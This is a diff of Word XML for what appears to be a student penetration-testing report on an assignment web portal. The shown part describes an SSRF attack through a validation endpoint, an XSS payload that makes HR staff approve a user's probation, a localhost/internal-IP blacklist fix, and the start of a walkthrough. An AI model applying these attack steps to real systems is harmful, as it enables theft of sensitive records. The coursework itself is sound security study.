+              <w:t>he exploitation requires the attacker to login first so if only specific users have the access to the portal, the likelihood that it happens will significantly decrease.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7411,7 +7581,36 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
+              <w:t>This vulnerability can be exploited by port-scanning the server</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> [2]</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> through the website validation API</w:t>
+            </w:r>
+            <w:r>
+              <w:t>. After f</w:t>
+            </w:r>
+            <w:r>
+              <w:t>inding</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> out the port</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, we can traverse the directory and eventually leaks out the sensitive information. For a detailed walkthrough, see </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Section_3_–" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 2, Section 3</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7467,26 +7666,27 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Major:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>An attacker could steal the background checks information of users by exploiting this vulnerability.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7543,14 +7743,56 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Possible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">Website validation </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">has strong smell of being a potential server-side request forgery vulnerability since the server normally needs to make requests to the website for validation. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>H</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>owever, exploiting this vulnerability requires the attacker to have a set of login credentials</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so the likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7598,23 +7840,45 @@
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>High:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> This vulnerability leaks out background checks information which are </w:t>
+            </w:r>
+            <w:r>
+              <w:t>highly</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> sensitive</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7622,9 +7886,6 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
-            <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7680,14 +7941,81 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1] </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId11" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:bCs/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>https://portswigger.net/web-security/ssrf</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">] </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Lecture 14 SSRF slides</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7734,7 +8062,12 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
               <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="12"/>
+              </w:numPr>
               <w:pBdr>
                 <w:top w:val="nil"/>
                 <w:left w:val="nil"/>
@@ -7743,9 +8076,87 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The fix goes here</w:t>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>B</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>lacklist</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost, http://127.0.0.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>, http://0.0.0.0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and http://</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>172.17.0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="12"/>
+              </w:numPr>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Close th</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>at</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> port if it is not necessary.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7969,7 +8380,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+              <w:t xml:space="preserve">Negligible: An attacker could do </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -8047,7 +8458,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+              <w:t>Almost Certain: The possibility of the vulnerability being exploited</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8111,14 +8522,14 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t>Medium</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:t>This is the reasoning behind my rating</w:t>
             </w:r>
@@ -8491,7 +8902,13 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+              <w:t>Negligible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: An attacker could do </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -8574,7 +8991,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+              <w:t>Possible: The possibility of the vulnerability being exploited</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8643,14 +9060,14 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t>Low</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:t>This is the reasoning behind my rating</w:t>
             </w:r>
@@ -8839,7 +9256,7 @@
                     <pic:cNvPicPr preferRelativeResize="0"/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -8959,7 +9376,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Each payload is placed at the end of the finding user API endpoint (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11580,7 +11997,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId13" cstate="print">
+                          <a:blip r:embed="rId14" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12591,7 +13008,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId14" cstate="print">
+                          <a:blip r:embed="rId15" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12713,7 +13130,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15"/>
+                          <a:blip r:embed="rId16"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -12753,7 +13170,7 @@
               </w:rPr>
               <w:t xml:space="preserve">isiting </w:t>
             </w:r>
-            <w:hyperlink r:id="rId16" w:history="1">
+            <w:hyperlink r:id="rId17" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12838,7 +13255,16 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;!--</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!--</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
@@ -12848,7 +13274,34 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> xss.html --&gt;</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>_1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.html --&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13254,14 +13707,32 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">njecting this payload as an anonymous question </w:t>
+              <w:t>njecting this payload as an anonymous question</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>will make the user “</w:t>
+              <w:t>when it is opened,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the user “</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -13275,19 +13746,37 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>” pass the probation on behalf of the HR team member who reads the question and we have “Updated” as the response</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> instead</w:t>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> will</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> pass the probation on behalf of the HR team member</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> who reads the question</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> This gives us “Updated” as the response.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13317,7 +13806,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId17"/>
+                          <a:blip r:embed="rId18"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13379,7 +13868,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18"/>
+                          <a:blip r:embed="rId19"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13633,6 +14122,54 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14009,7 +14546,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -14026,7 +14562,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="2DBA9C89">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="57F0A1CF">
                   <wp:extent cx="2128157" cy="1101812"/>
                   <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
                   <wp:docPr id="8" name="Picture 8"/>
@@ -14041,7 +14577,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19"/>
+                          <a:blip r:embed="rId20"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14049,7 +14585,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2196280" cy="1137081"/>
+                            <a:ext cx="2128157" cy="1101812"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -14086,6 +14622,8 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="53" w:name="_Section_3_–"/>
+      <w:bookmarkEnd w:id="53"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -14098,6 +14636,62 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ollowing step shows using the server-side request forgery to get the background checks information in form of the flag. Each payload is placed at the end of </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14114,14 +14708,14 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="786"/>
-        <w:gridCol w:w="4657"/>
-        <w:gridCol w:w="3576"/>
+        <w:gridCol w:w="659"/>
+        <w:gridCol w:w="4683"/>
+        <w:gridCol w:w="3677"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="659" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14153,7 +14747,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4581" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14185,7 +14779,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="3779" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14219,7 +14813,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="659" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14239,409 +14833,75 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4581" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ssrf_1.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
